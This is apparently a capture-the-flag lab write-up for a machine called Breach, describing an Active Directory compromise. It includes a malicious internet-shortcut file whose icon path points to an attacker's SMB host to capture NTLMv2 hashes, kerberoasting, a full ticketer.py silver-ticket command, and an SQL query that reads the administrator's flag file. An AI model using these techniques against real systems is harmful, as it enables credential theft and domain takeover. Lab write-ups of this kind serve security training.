🛠️Breach

You will learn about capturing hashes from placing files in shares & silver tickets

IP

10.10.99.74

Enumeration

We have a DC with domain breach.vl and hostname BREACHDC.breach.vl Nmap scan reveals a IIS webserver and Microsoft SQL service 2019 installed

Placing files in Shares

Enumerating SMB we find a share folder

In the transfer folder we find 3 folders with possible AD usernames

We cannot list or place files inside these User's folders

But we can place stuff in the other folders

[InternetShortcut]
URL=test
WorkingDirectory=test
IconFile=\\10.8.0.199\%USERNAME%.icon
IconIndex=1  

We run Responder and when a user visits the folder with our shortcut inside we get a NTLMv2 hash

We crack the hash and we get a password

MSSQL Privilege Escalation

Now we enumerate the domain with bloodhound

The MSSQL service account is kerberoastable

We got the password for the service account too

Now that we have the password we can create a Silver ticket and impersonate any account

We need the domain SID, we can find it in bloodhound

And the MSSQL NTLM password hash

ticketer.py -nthash 695..... -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip BREACHDC.breach.vl -spn MSSQLSVC/BREACHDC.breach.vl:1433 Administrator

We now have access to the DC

I tried to get a shell using xp_cmdshell but defender said nope and it was 2 am, i wanted to go to bed...

We can directly read the root flag without getting a shell

 SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\Desktop\root.txt',SINGLE_CLOB) AS FileContents;